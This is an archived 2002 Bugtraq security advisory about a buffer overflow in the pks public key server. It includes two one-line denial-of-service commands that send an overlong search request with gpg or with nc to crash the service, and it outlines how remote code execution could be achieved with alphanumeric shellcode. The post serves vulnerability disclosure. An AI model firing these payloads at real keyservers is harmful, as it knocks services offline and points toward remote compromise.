[25563] in bugtraq
pks public key server DOS and remote execution
daemon@ATHENA.MIT.EDU (Max)
Fri May 24 20:35:08 2002
Date: Fri, 24 May 2002 15:39:06 -0700 (PDT)
From: Max <rusmir@tula.net>
To: bugtraq@securityfocus.com
Message-ID: <Pine.LNX.4.44.0205241508290.12835-100000@sds.disney.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Hi there,
A popular pks public key server available from
http://www.mit.edu/people/marc/pks/pks.html
is vulnerable to buffer overflow attack.
A long enough (> 256b) search request will crash the service.
It is as simple as this:
gpg --search-keys `perl -e "print 'A'x512"`
or, without gpg,
echo -e "GET /pks/lookup?op=index&search=`perl -e "print 'A'x512"`"| nc keyserver-host 11371
Fortunately (or unfortunately) in order to exploit remote execution, the
code should be isalnum() string and should be able to survive tolower()
conversion. But it is possible to write, especially for systems with
locales, where 0x80..0xff are printable characters.
Thanks,
Max.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (GNU/Linux)
iD8DBQE87sEN8mCpXsrcXpwRAiBoAJ9UjT7+XPoBJ0COO/W5gIHHFYmOygCgm80Y
oIAccr98kivYr2KsuF4SFzg=
=9quB
-----END PGP SIGNATURE-----
